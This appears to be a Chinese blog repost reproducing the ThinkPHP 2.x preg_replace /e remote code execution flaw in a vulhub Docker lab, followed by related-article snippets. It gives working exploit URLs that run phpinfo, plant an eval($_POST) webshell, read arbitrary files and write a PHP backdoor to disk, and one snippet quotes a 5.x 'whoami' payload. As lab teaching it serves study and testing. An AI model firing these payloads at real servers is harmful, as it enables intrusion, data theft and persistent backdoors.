php漏洞2019,2019-11-14:ThinkPHP 2.x 任意代码执行漏洞,复现

最新推荐文章于 2024-08-19 14:25:55 发布
最新推荐文章于 2024-08-19 14:25:55 发布
阅读量236 收藏 1
点赞数
文章标签: php漏洞2019

*文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

一、环境搭建

1,使用docker,vulhub搭建环境

使用命令,cd  /vulhub-master/thinkphp/2-rce,进入漏洞环境目录

使用命令,sudo docker-compose up -d,下载运行环境

使用命令,sudo docker ps,确定环境搭建成功,端口为8080

f31913b75a49b4f2d9e8602071895793.png

8029aa4e46ab973b48bcd1980007f58e.png

2,打开浏览器,访问靶机ip,加8080端口,访问成功,说明环境搭建好了

7d239e4b752ddd06ee5a8b9f5125e98a.png

二、漏洞复现

POC:直接访问http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D即可执行phpinfo():

7ea8d30e571726b72c968caac1f6c08e.png

2,一句话POC,http://192.168.190.133:8080/index.php?s=/index/index/name/${${@eval($_POST[1])}}

a34ae77d27f62fed62a0c9413c3a9cea.png

33f201408443703c513fd3687f1b07ca.png

e51a0a6d619318f32f70468d7b5f0619.png

3,读文件POC:http://192.168.190.133:8080/index.php?s=/index/index/name/{${exit(var_dump(file_get_contents($_POST[1])))}}

bec8010f8d4aebeee5aa5c43d1a11bad.png

c78940659897a11fe3ad718643dd8537.png

4,写文件POC:http://192.168.190.133:8080/index.php?s=/index/index/name/{${exit(var_dump(file_put_contents($_POST[f],$_POST[d])))}}

POST DATA:f=1.txt&d=<?php @eval($_POST[aa])?>

d9d1a6dd5d371edc8f32b52ade960594.png

c563930665874040a6e6321ca3444d06.png

标签:11,index,8080,14,漏洞,代码执行,POST,POC,name

来源: https://www.cnblogs.com/sym945/p/11854963.html

刘璐璐璐璐璐
关注
复现Thinkphp 2.x 任意代码执行漏洞
记录并分享学习安全的知识点..
07-03 453
ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架,这个框架曾经爆出各种RCE和SQL注入漏洞。由于 ThinkPHP 中没有对控制器进行检测,导致在没有开启强制路由的情况下攻击者可以通过此漏洞进行远程命令执行。 ......
Thinkphp V5.X 远程代码执行漏洞 - POC(精:集群5.0*、5.1*、5.2*)
墨痕诉清风的博客
11-07 4506
官方公告:1、2、POC:批量检测单个检测。
ThinkPHP 2.x 任意代码执行漏洞复现
zeroc009的博客
02-14 377
ThinkPHP 2.x 任意代码执行漏洞复现漏洞简述影响范围复现过程 漏洞简述 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at position 7: depr.'\̲
【vulhub漏洞复现Thinkphp 2.x 任意代码执行
RexHa的博客
02-28 2553
当preg_replace使用了/e模式,可以导致代码执行。该函数的正则规则和目标字符可以由用户进行输入。preg_replace 函数在匹配到符号正则的字符串时,会将替换字符(第二个参数)当做代码执行。在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由,导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
thinkphp2.xRCE漏洞复现
最新发布
kjssy的博客
08-19 139
启动环境之后访问ip:8080。
ThinkPHP 2.x 任意代码执行漏洞复现
ximo的博客
03-17 703
ThinkPHP 2.x 任意代码执行漏洞 漏洞描述: ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞漏洞复现 POC:
vulhub中ThinkPHP 2.x 任意代码执行漏洞复现
yougexiaojiuguan的博客
03-06 257
漏洞复现过程的记录
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
ctf之php漏洞,ctf入门到Thinkphp2.x、3.0-3.1版代码执行漏洞分析
weixin_39738380的博客
04-01 739
前言:文章可能有点长,小弟不才,只能靠刷ctf来理解一些内容。若有不恰当之处,望大佬们不吝赐教。一、[BJDCTF2020]ZJCTF先做一道ctf压压惊:[BJDCTF2020]ZJCTF构建以下payload,进入if判断,并且进入include()函数?text=data://text/plain,I have a dream&file=php://filter/convert.ba...
漏洞复现ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1522
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
Thinkphp 2.x rce
qq_53086690的博客
11-23 940
Thinkphp 2.x rce Thinkphp简介 Thinkphp 是一个开源的,快速、简单的面向对象的轻量级PHP开发框架 漏洞影响版本 Thinkphp 2.x 漏洞概述 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行
ThinkPHP 2.x 任意代码执行漏洞
EC_Carrot的博客
08-17 150
漏洞详细 详细请看:https://vulhub.org/#/environments/thinkphp/2-rce/ 漏洞复现 直接访问http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D即可执行代码phpinfo():
Thinkphp 2-rce 漏洞复现(vulhub)
MDSEC的博客
08-20 277
首先,你需要在本地或虚拟机上搭建一个运行Vulhub的环境。你可以从Vulhub的GitHub仓库中下载并安装Docker和docker-compose工具,然后克隆对应的ThinkPHP 2漏洞利用环境。在浏览器中,你将看到一个简单的ThinkPHP应用程序。根据漏洞描述,你需要在URL中添加参数来触发漏洞。如果成功利用漏洞,你将在浏览器中看到返回的结果,例如当前用户的信息。将上述URL参数添加到应用程序的URL后面,然后按回车键执行请求。进入ThinkPHP 2漏洞利用环境所在的目录,打开。
PHP常见漏洞的防范措施
大鹏
12-18 2115
一、常见PHP网站安全漏洞 对于PHP漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。 1、session文件漏洞 Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码,PHP设置了Session和Cookie用
PHP网站常见一些安全漏洞及防御方法_php
liuhyusb的博客
01-02 645
一、常见PHP网站安全漏洞对于PHP漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。1、session文件漏洞Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码,PHP设置了Session和Cookie用于方便用户的使用和访向。2、SQL注入漏洞
PHP网站常见一些安全漏洞及防御方法
Spontaneous_0的博客
01-24 1097
一、常见PHP网站安全漏洞对于PHP漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。1、session文件漏洞Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码,PHP设置了Session和Cookie用于方便用户的使用和访向。2、SQL注入漏洞
渗透测试 | ThinkPHP渗透
weixin_50464560的博客
03-31 2980
转载至 渗透测试 | ThinkPHP渗透 - FreeBuf网络安全行业门户 前言 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为 ThinkPHP 它遵循 Apache2开源协议发布,从 Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了 Struts的思想和 TagLib(标签库)、RoR的ORM映射和 ActiveRecord模式。 Thi..
thinkphp 2.x 任意代码执行漏洞
06-28
这个问题是关于ThinkPHP 2.x是否存在代码漏洞的。据我所知,目前没有任何官方宣布过该版本存在漏洞的消息。但是任何一个应用程序都有可能存在漏洞,因此在使用任何版本的框架时都需要小心谨慎,并始终保持最新版本的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值